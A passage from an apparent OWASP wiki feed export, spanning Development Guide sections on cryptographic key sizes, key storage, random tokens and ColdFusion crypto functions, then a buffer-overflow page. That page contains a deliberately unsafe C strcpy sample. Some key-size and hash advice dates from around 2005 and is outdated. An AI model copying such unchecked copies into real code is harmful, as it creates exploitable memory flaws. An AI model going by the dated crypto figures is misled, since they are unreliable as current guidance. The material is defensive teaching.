* Consider 168 or 256 bits for secure systems such as large financial transactions&lt;br /&gt;
&lt;br /&gt;
'''Asymmetric:'''&lt;br /&gt;
&lt;br /&gt;
The difficulty of cracking a 2048 bit key compared to a 1024 bit key is far, far, far, more than the twice you might expect. Don’t use excessive key sizes unless you know you need them. Bruce Schneier in 2002 (see the references section) recommended the following key lengths for circa 2005 threats:&lt;br /&gt;
&lt;br /&gt;
* Key sizes of 1280 bits are sufficient for most personal applications&lt;br /&gt;
&lt;br /&gt;
* 1536 bits should be acceptable today for most secure applications&lt;br /&gt;
&lt;br /&gt;
* 2048 bits should be considered for highly protected applications.&lt;br /&gt;
&lt;br /&gt;
'''Hashes:'''&lt;br /&gt;
&lt;br /&gt;
* Hash sizes of 128 bits (standard for SSL) are sufficient for most applications&lt;br /&gt;
&lt;br /&gt;
* Consider 168 or 256 bits for secure systems, as many hash functions are currently being revised (see above).&lt;br /&gt;
&lt;br /&gt;
NIST and other standards bodies will provide up to date guidance on suggested key sizes.&lt;br /&gt;
&lt;br /&gt;
'''Design your application to cope with new hashes and algorithms'''&lt;br /&gt;
&lt;br /&gt;
==Key Storage ==&lt;br /&gt;
&lt;br /&gt;
As highlighted above, crypto relies on keys to assure a user’s identity, provide confidentiality and integrity as well as non-repudiation. It is vital that the keys are adequately protected. Should a key be compromised, it can no longer be trusted.&lt;br /&gt;
&lt;br /&gt;
Any system that has been compromised in any way should have all its cryptographic keys replaced. &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
Unless you are using hardware cryptographic devices, your keys will most likely be stored as binary files on the system providing the encryption. &lt;br /&gt;
&lt;br /&gt;
Can you export the private key or certificate from the store? &lt;br /&gt;
&lt;br /&gt;
* Are any private keys or certificate import files (usually in PKCS#12 format) on the file system? Can they be imported without a password?&lt;br /&gt;
&lt;br /&gt;
* Keys are often stored in code. This is a bad idea, as it means you will not be able to easily replace keys should they become compromised.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Cryptographic keys should be protected as much as is possible with file system permissions. They should be read only and only the application or user directly accessing them should have these rights.&lt;br /&gt;
&lt;br /&gt;
* Private keys should be marked as not exportable when generating the certificate signing request. &lt;br /&gt;
&lt;br /&gt;
* Once imported into the key store (CryptoAPI, Certificates snap-in, Java Key Store, etc.), the private certificate import file obtained from the certificate provider should be safely destroyed from front-end systems. This file should be safely stored in a safe until required (such as installing or replacing a new front end server).&lt;br /&gt;
&lt;br /&gt;
* Host based intrusion systems should be deployed to monitor access of keys. At the very least, changes in keys should be monitored.&lt;br /&gt;
&lt;br /&gt;
* Applications should log any changes to keys. &lt;br /&gt;
&lt;br /&gt;
* Pass phrases used to protect keys should be stored in physically secure places; in some environments, it may be necessary to split the pass phrase or password into two components such that two people will be required to authorize access to the key. These physical, manual processes should be tightly monitored and controlled.&lt;br /&gt;
&lt;br /&gt;
* Storage of keys within source code or binaries should be avoided. This not only has consequences if developers have access to source code, but key management will be almost impossible.&lt;br /&gt;
&lt;br /&gt;
* In a typical web environment, web servers themselves will need permission to access the key. This has obvious implications that other web processes or malicious code may also have access to the key. In these cases, it is vital to minimize the functionality of the system and application requiring access to the keys.&lt;br /&gt;
&lt;br /&gt;
* For interactive applications, a sufficient safeguard is to use a pass phrase or password to encrypt the key when stored on disk. This requires the user to supply a password on startup, but means the key can safely be stored in cases where other users may have greater file system privileges.&lt;br /&gt;
&lt;br /&gt;
Storage of keys in hardware crypto devices is beyond the scope of this document. If you require this level of security, you should really be consulting with crypto specialists.&lt;br /&gt;
&lt;br /&gt;
==Insecure transmission of secrets ==&lt;br /&gt;
&lt;br /&gt;
In security, we assess the level of trust we have in information. When applied to transmission of sensitive data, we need to ensure that encryption occurs before we transmit the data onto any untrusted network. &lt;br /&gt;
&lt;br /&gt;
In practical terms, this means we should aim to encrypt as close to the source of the data as possible.&lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
This can be extremely difficult without expert help. We can try to at least eliminate the most common problems:&lt;br /&gt;
&lt;br /&gt;
* The encryption algorithm or protocol needs to be adequate to the task. The above discussion on weak algorithms and weak keys should be a good starting point.&lt;br /&gt;
&lt;br /&gt;
* We must ensure that through all paths of the transmission we apply this level of encryption.&lt;br /&gt;
&lt;br /&gt;
* Extreme care needs to be taken at the point of encryption and decryption. If your encryption library needs to use temporary files, are these adequately protected? &lt;br /&gt;
&lt;br /&gt;
* Are keys stored securely? Is an unsecured file left behind after it has been encrypted?&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
We have the possibility to encrypt or otherwise protect data at different levels. Choosing the right place for this to occur can involve looking at both security as well as resource requirements. &lt;br /&gt;
&lt;br /&gt;
'''Application''': at this level, the actual application performs the encryption or other crypto function. This is the most desirable, but can place additional strain on resources and create unmanageable complexity. Encryption would be performed typically through an API such as the OpenSSL toolkit (www.openssl.com) or operating system provided crypto functions.&lt;br /&gt;
&lt;br /&gt;
An example would be an S/MIME encrypted email, which is transmitted as encoded text within a standard email. No changes to intermediate email hosts are necessary to transmit the message because we do not require a change to the protocol itself.&lt;br /&gt;
&lt;br /&gt;
'''Protocol''': at this layer, the protocol provides the encryption service. Most commonly, this is seen in HTTPS, using SSL encryption to protect sensitive web traffic. The application no longer needs to implement secure connectivity. However, this does not mean the application has a free ride. SSL requires careful attention when used for mutual (client-side) authentication, as there are two different session keys, one for each direction. Each should be verified before transmitting sensitive data.&lt;br /&gt;
&lt;br /&gt;
Attackers and penetration testers love SSL to hide malicious requests (such as injection attacks for example). Content scanners are most likely unable to decode the SSL connection, letting it pass to the vulnerable web server.&lt;br /&gt;
&lt;br /&gt;
'''Network''': below the protocol layer, we can use technologies such as Virtual Private Networks (VPN) to protect data. This has many incarnations, the most popular being IPsec (Internet Protocol v6 Security), typically implemented as a protected ‘tunnel’ between two gateway routers. Neither the application nor the protocol needs to be crypto aware – all traffic is encrypted regardless.&lt;br /&gt;
&lt;br /&gt;
Possible issues at this level are computational and bandwidth overheads on network devices.&lt;br /&gt;
&lt;br /&gt;
==Reversible Authentication Tokens ==&lt;br /&gt;
&lt;br /&gt;
Today’s web servers typically deal with large numbers of users. Differentiating between them is often done through cookies or other session identifiers. If these session identifiers use a predictable sequence, an attacker need only generate a value in the sequence in order to present a seemingly valid session token.&lt;br /&gt;
&lt;br /&gt;
This can occur at a number of places; the network level for TCP sequence numbers, or right through to the application layer with cookies used as authenticating tokens.&lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
Any deterministic sequence generator is likely to be vulnerable.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
The only way to generate secure authentication tokens is to ensure there is no way to predict their sequence. In other words: true random numbers.&lt;br /&gt;
&lt;br /&gt;
It could be argued that computers can not generate true random numbers, but using new techniques such as reading mouse movements and key strokes to improve entropy has significantly increased the randomness of random number generators. It is critical that you do not try to implement this on your own; use of existing, proven implementations is highly desirable.&lt;br /&gt;
&lt;br /&gt;
Most operating systems include functions to generate random numbers that can be called from almost any programming language.&lt;br /&gt;
&lt;br /&gt;
'''Windows &amp;amp; .NET:''' On Microsoft platforms including .NET, it is recommended to use the inbuilt CryptGenRandom function (&amp;lt;u&amp;gt;http://msdn.microsoft.com/library/default.asp?url=/library/en-us/seccrypto/security/cryptgenrandom.asp&amp;lt;/u&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
'''Unix:''' For all Unix based platforms, OpenSSL is an excellent option (&amp;lt;u&amp;gt;http://www.openssl.org/&amp;lt;/u&amp;gt;). It features tools and API functions to generate random numbers. On some platforms, /dev/urandom is a suitable source of pseudo-random entropy.&lt;br /&gt;
&lt;br /&gt;
'''PHP:'''  mt_rand() uses a Mersenne Twister, but is nowhere near as good as CryptoAPI’s secure random number generation options, OpenSSL, or /dev/urandom which is available on many Unix variants. mt_rand() has been noted to produce the same number on some platforms – test prior to deployment. '''Do not use rand() as it is very weak.'''&lt;br /&gt;
&lt;br /&gt;
'''Java:''' java.security.SecureRandom within the Java Cryptography Extension (JCE) provides secure random numbers. This should be used in preference to other random number generators.&lt;br /&gt;
&lt;br /&gt;
'''ColdFusion: '''ColdFusion MX 7 leverages the JCE java.security.SecureRandom class of the underlying JVM as its pseudo random number generator (PRNG)'''''.'' '''&lt;br /&gt;
&lt;br /&gt;
==Safe UUID generation ==&lt;br /&gt;
&lt;br /&gt;
UUIDs (such as GUIDs and so on) are only unique if you generate them. This seems relatively straightforward. However, there are many code snippets available that contain existing UUIDS. &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
# Determine the source of your existing UUIDS &lt;br /&gt;
## Did they come from MSDN?&lt;br /&gt;
## Or from an example found on the Internet? &lt;br /&gt;
# Use your favorite search engine to find out&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Do not cut and paste UUIDs and GUIDs from anything other than the UUIDGEN program or from the UuidCreate() API&lt;br /&gt;
&lt;br /&gt;
* Generate fresh UUIDs or GUIDs for each new program &lt;br /&gt;
&lt;br /&gt;
==Summary ==&lt;br /&gt;
&lt;br /&gt;
Cryptography is one of pillars of information security. Its usage and propagation has exploded due to the Internet and it is now included in most areas computing. Crypto can be used for:&lt;br /&gt;
&lt;br /&gt;
* Remote access such as IPsec VPN&lt;br /&gt;
&lt;br /&gt;
* Certificate based authentication&lt;br /&gt;
&lt;br /&gt;
* Securing confidential or sensitive information&lt;br /&gt;
&lt;br /&gt;
* Obtaining non-repudiation using digital certificates&lt;br /&gt;
&lt;br /&gt;
* ?Online orders and payments&lt;br /&gt;
&lt;br /&gt;
* Email and messaging security such as S/MIME&lt;br /&gt;
&lt;br /&gt;
A web application can implement cryptography at multiple layers: application, application server or runtime (such as .NET), operating system and hardware. Selecting an optimal approach requires a good understanding of application requirements, the areas of risk, and the level of security strength it might require, flexibility, cost, etc.&lt;br /&gt;
&lt;br /&gt;
Although cryptography is not a panacea, the majority of security breaches do not come from brute force computation but from exploiting mistakes in implementation. The strength of a cryptographic system is measured in key length. Using a large key length and then storing the unprotected keys on the same server eliminates most of the protection benefit gained. Besides the secure storage of keys, another classic mistake is engineering custom cryptographic algorithms (to generate random session ids for example). Many web applications were successfully attacked because the developers thought they could create their crypto functions. &lt;br /&gt;
&lt;br /&gt;
Our recommendation is to use proven products, tools, or packages rather than rolling your own.&lt;br /&gt;
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
* Wu, H., ''Misuse of stream ciphers in Word and Excel''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://eprint.iacr.org/2005/007.pdf&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Bindview, ''Vulnerability in Windows NT's SYSKEY encryption'' &lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.bindview.com/Services/razor/Advisories/1999/adv_WinNT_syskey.cfm&amp;lt;/u&amp;gt; [[category:FIXME|is this going to the correct page?]]&lt;br /&gt;
&lt;br /&gt;
* Schneier, B. ''Is 1024 bits enough?, ''April 2002 Cryptogram''&lt;br /&gt;
&lt;br /&gt;
''&amp;lt;u&amp;gt;http://www.schneier.com/crypto-gram-0204.html#3&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Schneier, B., Cryptogram, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.counterpane.com/cryptogram.html&amp;lt;/u&amp;gt; [[category:FIXME|link not working]]&lt;br /&gt;
&lt;br /&gt;
* NIST, Replacing SHA-1 with stronger variants: SHA-256 ? 512&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://csrc.nist.gov/CryptoToolkit/tkhash.html&amp;lt;/u&amp;gt; [[category:FIXME|these two links go to the same page]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://csrc.nist.gov/CryptoToolkit/tkencryption.html&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* UUIDs are only unique if you generate them:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://blogs.msdn.com/larryosterman/archive/2005/07/21/441417.aspx&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Cryptographically Secure Random Numbers on Win32:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://blogs.msdn.com/michael_howard/archive/2005/01/14/353379.aspx&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Cryptography ==&lt;br /&gt;
&lt;br /&gt;
The following section describes ColdFusion’s cryptography features. ColdFusion MX leverages the Java Cryptography Extension (JCE) of the underlying J2EE platform for cryptography and random number generation. It provides functions for symmetric (or private-key) encryption. While it does not provide native functionality for public-key (asymmetric) encryption, it does use the Java Secure Socket Extension (JSSE) for SSL communication.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Pseudo-Random Number Generation'''&lt;br /&gt;
&lt;br /&gt;
ColdFusion provides three functions for random number generation: rand(), randomize(), and randRange(). Function descriptions and syntax:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Rand''' – Use to generate a pseudo-random number&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''	rand([algorithm])'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Randomize''' – Use to seed the pseudo-random number generator (PRNG) with an integer.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''	randomize(number [, algorithm])'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''RandRange''' – Use to generate a pseudo-random integer within the range of the specified numbers&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''	randrange(number1, number2 [, algorithm])'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The following values are the allowed algorithm parameters''' ''':&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
CFMX_COMPAT: (default) – Invokes java.util.rand&lt;br /&gt;
&lt;br /&gt;
SHA1PRNG: (recommended) – Invokes java.security.SecureRandom using the Sun Java SHA-1 PRNG algorithm.&lt;br /&gt;
&lt;br /&gt;
IBMSecureRandom: IBM WebSphere’s JVM does not support the SHA1PRNG algorithm. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Symmetric Encryption'''&lt;br /&gt;
&lt;br /&gt;
ColdFusion MX 7 provides six encryption functions: decrypt(), decryptBinary(), encrypt(), encryptBinary(), generateSecretKey(), and hash(). Function descriptions and syntax:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Decrypt''' – Use to decrypt encrypted strings with specified key, algorithm, encoding, initialization vector or salt, and iterations&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''	decrypt(encrypted_string, key[, algorithm[, encoding[, IVorSalt[, iterations]]]]))'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''DecryptBinary''' – Use to decrypt encrypted binary data with specified key, algorithm, initialization vector or salt, and iterations&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''	decryptBinary(bytes, key[, algorithm[, IVorSalt[, iterations]]])'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Encrypt''' – Use to encrypt string using specific algorithm, encoding, initialization vector or salt, and iterations&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''	encrypt(string, key[, algorithm[, encoding[, IVorSalt[, iterations]]]]))'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''EncryptBinary''' – Use to encrypt binary data with specified key, algorithm, initialization vector or salt, and iterations&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''	encryptBinary(bytes, key[, algorithm[, IVorSalt[, iterations]]])'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''GenerateSecretKey''' – Use to generate a secure key using the specified algorithm for the encrypt and encryptBinary functions&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''	generateSecretKey(algorithm)'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Hash '''– Use for one-way conversion of a variable-length string to fixed-length string using the specified algorithm and encoding&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''	hash(string[, algorithm[, encoding]] )'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
ColdFusion offers the following default algorithms for these functions''' ''':&lt;br /&gt;
&lt;br /&gt;
CFMX_COMPAT: the algorithm used in ColdFusion MX and prior releases. This algorithm is the least secure option (default). &lt;br /&gt;
&lt;br /&gt;
AES: the Advanced Encryption Standard specified by the National Institute of Standards and Technology (NIST) FIPS-197. (recommended)&lt;br /&gt;
&lt;br /&gt;
BLOWFISH: the Blowfish algorithm defined by Bruce Schneier. &lt;br /&gt;
&lt;br /&gt;
DES: the Data Encryption Standard algorithm defined by NIST FIPS-46-3. &lt;br /&gt;
&lt;br /&gt;
DESEDE: the &amp;quot;Triple DES&amp;quot; algorithm defined by NIST FIPS-46-3. &lt;br /&gt;
&lt;br /&gt;
PBEWithMD5AndDES: A password-based version of the DES algorithm which uses a MD5 hash of the specified password as the encryption key &lt;br /&gt;
&lt;br /&gt;
PBEWithMD5AndTripleDES: A password-based version of the DESEDE algorithm which uses a MD5 hash of the specified password as the encryption key&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The following algorithms are provided by default for the hash() function. Note, SHA algorithms used in ColdFusion are NIST FIPS-180-2 compliant''' ''':&lt;br /&gt;
&lt;br /&gt;
CFMX_COMPAT: Generates a MD5 hash string identical to that generated by ColdFusion MX and ColdFusion MX 6.1 (default). &lt;br /&gt;
&lt;br /&gt;
MD5: Generates a 128-bit digest.&lt;br /&gt;
&lt;br /&gt;
SHA: Generates a 160-bit digest. (SHA-1)&lt;br /&gt;
&lt;br /&gt;
SHA-256: Generates a 256-bit digest&lt;br /&gt;
&lt;br /&gt;
SHA-384: Generates a 384-bit digest&lt;br /&gt;
&lt;br /&gt;
SHA-512: Generates a 512-bit digest&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Pluggable Encryption'''&lt;br /&gt;
&lt;br /&gt;
ColdFusion MX 7 introduced pluggable encryption for CFML. The JCE allows developers to specify multiple cryptographic service providers. ColdFusion can leverage the algorithms, feedback modes, and padding methods of third-party Java security providers to strengthen its cryptography functions. For example, ColdFusion can leverage the Bouncy Castle ('''&amp;lt;u&amp;gt;http://www.bouncycastle.org/'''&amp;lt;/u&amp;gt;) crypto package and use the SHA-224 algorithm for the hash() function or the Serpent block encryption for the encrypt() function.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
See Macromedia’s Strong Encryption in ColdFusion MX 7 technote for information on installing additional security providers for ColdFusion at http://www.macromedia.com/go/e546373d. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''SSL'''&lt;br /&gt;
&lt;br /&gt;
ColdFusion does not provide tags and functions for public-key encryption, but it can communicate over SSL. ColdFusion leverages the Sun JSSE to communicate over SSL with web and LDAP (lightweight directory access protocol) servers. ColdFusion uses the Java certificate database (e.g. jre_root/lib/security/cacerts) to store server certificates. It compares presented certificate of remote systems to those stored in the database. It also grabs the host system’s certificate from this database and uses it to present to remote systems to initiate the SSL handshake. Certificate information is then exposed as CGI variables.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''Best Practices'''''&lt;br /&gt;
&lt;br /&gt;
*Enable /dev/urandom for higher entropy for random number generation&lt;br /&gt;
&lt;br /&gt;
*Call the randomize function before calling rand() or randRange() to seed the random number generator&lt;br /&gt;
&lt;br /&gt;
*DO NOT use the CFMX_COMPAT algorithms. Upgrade your application to use stronger cryptographic ciphers.&lt;br /&gt;
&lt;br /&gt;
*Use AES or higher for symmetric encryption &lt;br /&gt;
&lt;br /&gt;
*Use SHA-256 or higher for the hash function&lt;br /&gt;
&lt;br /&gt;
*Use a salt (or random string) for password generation with the hash function&lt;br /&gt;
&lt;br /&gt;
*Always use generateSecretKey() to generate keys of the appropriate length for Block Encryption algorithms unless a customized key is required&lt;br /&gt;
&lt;br /&gt;
*Use separate key databases to store remote server certificates separately from the ColdFusion server’s certificate&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:Encryption]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Buffer_Overflows&amp;diff=59856</id>
		<title>Buffer Overflows</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Buffer_Overflows&amp;diff=59856"/>
				<updated>2009-05-02T11:47:52Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Further reading */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]__TOC__'''&lt;br /&gt;
&lt;br /&gt;
==Objective ==&lt;br /&gt;
&lt;br /&gt;
To ensure that:&lt;br /&gt;
&lt;br /&gt;
* Applications do not expose themselves to faulty components.&lt;br /&gt;
&lt;br /&gt;
* Applications create as few buffer overflows as possible.&lt;br /&gt;
&lt;br /&gt;
* Developers are encouraged to use languages and frameworks that are relatively immune to buffer overflows.&lt;br /&gt;
&lt;br /&gt;
==Platforms Affected ==&lt;br /&gt;
&lt;br /&gt;
Almost every platform, with the following notable exceptions:&lt;br /&gt;
&lt;br /&gt;
* Java/J2EE – as long as native methods or system calls are not invoked.&lt;br /&gt;
&lt;br /&gt;
* .NET – as long as unsafe or unmanaged code is not invoked (such as the use of P/Invoke or COM Interop).&lt;br /&gt;
&lt;br /&gt;
* PHP, Python, Perl – as long as external programs or vulnerable extensions are not used.&lt;br /&gt;
&lt;br /&gt;
==Relevant COBIT Topics ==&lt;br /&gt;
&lt;br /&gt;
DS11.9 – Data processing integrity.&lt;br /&gt;
&lt;br /&gt;
==Description ==&lt;br /&gt;
&lt;br /&gt;
Attackers generally use [[Buffer Overflow|buffer overflows]] to corrupt the execution stack of a web application. By sending carefully crafted input to a web application, an attacker can cause the web application to execute arbitrary code, possibly taking over the machine. Attackers have managed to identify buffer overflows in a staggering array of products and components. &lt;br /&gt;
&lt;br /&gt;
Buffer overflow flaws can be present in both the web server and application server products that serve the static and dynamic portions of a site, or in the web application itself. Buffer overflows found in commonly-used server products are likely to become widely known and can pose a significant risk to users of these products. When web applications use libraries, such as a graphics library to generate images or a communications library to send e-mail, they open themselves to potential buffer overflow attacks. Literature detailing buffer overflow attacks against commonly-used products is readily available, and newly discovered vulnerabilities are reported almost daily. &lt;br /&gt;
&lt;br /&gt;
Buffer overflows can also be found in custom web application code, and may even be more likely, given the lack of scrutiny that web applications typically go through. Buffer overflow attacks against customized web applications can sometimes lead to interesting results. In some cases, we have discovered that sending large inputs can cause the web application or the back-end database to malfunction. It is possible to cause a denial of service attack against the web site, depending on the severity and specific nature of the flaw. Overly large inputs could cause the application to display a detailed error message, potentially leading to a successful attack on the system.&lt;br /&gt;
&lt;br /&gt;
Buffer overflow attacks generally rely upon two techniques (and usually the combination):&lt;br /&gt;
&lt;br /&gt;
* Writing data to particular memory addresses&lt;br /&gt;
&lt;br /&gt;
* Having the operating system mishandle data types&lt;br /&gt;
&lt;br /&gt;
* This means that strongly-typed programming languages (and environments) that disallow direct memory access usually prevent buffer overflows from happening.&lt;br /&gt;
&lt;br /&gt;
{| border=1&lt;br /&gt;
|-&lt;br /&gt;
 ! Language/Environment !! Compiled or Interpreted !! Strongly Typed !! Direct Memory Access !! Safe or Unsafe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || Java, Java Virtual Machine (JVM) || Both || Yes || No || Safe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || .NET || Both || Yes || No || Safe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || Perl  || Both || Yes || No || Safe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || Python - interpreted || Intepreted || Yes || No || Safe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || Ruby || Interpreted || Yes || No || Safe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || C/C++ || Compiled || No || Yes || Unsafe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || Assembly || Compiled || No || Yes || Unsafe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || COBOL || Compiled || Yes || No || Safe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
Table 8.1: Language descriptions&lt;br /&gt;
&lt;br /&gt;
==General Prevention Techniques ==&lt;br /&gt;
&lt;br /&gt;
A number of general techniques to prevent buffer overflows include:&lt;br /&gt;
&lt;br /&gt;
* Code auditing (automated or manual)&lt;br /&gt;
&lt;br /&gt;
* Developer training – bounds checking, use of unsafe functions, and group standards&lt;br /&gt;
&lt;br /&gt;
* Non-executable stacks – many operating systems have at least some support for this&lt;br /&gt;
&lt;br /&gt;
* Compiler tools – StackShield, StackGuard, and Libsafe, among others&lt;br /&gt;
&lt;br /&gt;
* Safe functions – use strncat instead of strcat, strncpy instead of strcpy, etc&lt;br /&gt;
&lt;br /&gt;
* Patches – Be sure to keep your web and application servers fully patched, and be aware of bug reports relating to applications upon which your code is dependent.&lt;br /&gt;
&lt;br /&gt;
* Periodically scan your application with one or more of the commonly available scanners that look for buffer overflow flaws in your server products and your custom web applications. &lt;br /&gt;
&lt;br /&gt;
==Stack Overflow ==&lt;br /&gt;
&lt;br /&gt;
Stack overflows are the best understood and the most common form of buffer overflows. The basics of a stack overflow is simple:&lt;br /&gt;
&lt;br /&gt;
* There are two buffers, a source buffer containing arbitrary input (presumably from the attacker), and a destination buffer that is too small for the attack input. The second buffer resides on the stack and somewhat adjacent to the function return address on the stack.&lt;br /&gt;
&lt;br /&gt;
* The faulty code does ''not'' check that the source buffer is too large to fit in the destination buffer. It copies the attack input to the destination buffer, overwriting additional information on the stack (such as the function return address).&lt;br /&gt;
&lt;br /&gt;
* When the function returns, the CPU unwinds the stack frame and pops the (now modified) return address from the stack.&lt;br /&gt;
&lt;br /&gt;
* Control does not return to the function as it should. Instead, arbitrary code (chosen by the attacker when crafting the initial input) is executed. &lt;br /&gt;
&lt;br /&gt;
The following example, written in C, demonstrates a stack overflow exploit.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;string.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
void f(char* s) {&lt;br /&gt;
    char buffer[10];&lt;br /&gt;
    strcpy(buffer, s);&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
void main(void) {&lt;br /&gt;
    f(&amp;quot;01234567890123456789&amp;quot;);&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
[root /tmp]# ./stacktest&lt;br /&gt;
&lt;br /&gt;
Segmentation fault&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
If your program:&lt;br /&gt;
&lt;br /&gt;
* is written in a language (or depends upon a program that is written in a language) that allows buffer overflows to be created (see Table 8.1) AND&lt;br /&gt;
&lt;br /&gt;
* copies data from one buffer on the stack to another without checking sizes first AND&lt;br /&gt;
&lt;br /&gt;
* does not use techniques such as canary values or non-executable stacks to prevent buffer overflows THEN&lt;br /&gt;
&lt;br /&gt;
it is likely that the application is vulnerable to attack.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
# Deploy on systems capable of using non-executable stacks, such as:&lt;br /&gt;
## AMD and Intel x86-64 chips with associated 64-bit operating systems&lt;br /&gt;
## Windows XP SP2 (both 32- and 64-bit)&lt;br /&gt;
## Windows 2003 SP1 (both 32- and 64-bit)&lt;br /&gt;
## Linux after 2.6.8 on AMD and x86-64 processors in 32- and 64-bit mode&lt;br /&gt;
## OpenBSD (w^x on Intel, AMD, SPARC, Alpha and PowerPC)&lt;br /&gt;
## Solaris 2.6 and later with the “noexec_user_stack” flag enabled&lt;br /&gt;
# Use higher-level programming languages that are strongly typed and that disallow direct memory access. &lt;br /&gt;
# Validate input to prevent unexpected data from being processed, such as being too long, of the wrong data type, containing &amp;quot;junk&amp;quot; characters, etc. &lt;br /&gt;
# If relying upon operating system functions or utilities written in a vulnerable language, ensure that they:&lt;br /&gt;
## use the principle of least privilege&lt;br /&gt;
## use compilers that protect against stack and heap overflows&lt;br /&gt;
## are current in terms of patches&lt;br /&gt;
&lt;br /&gt;
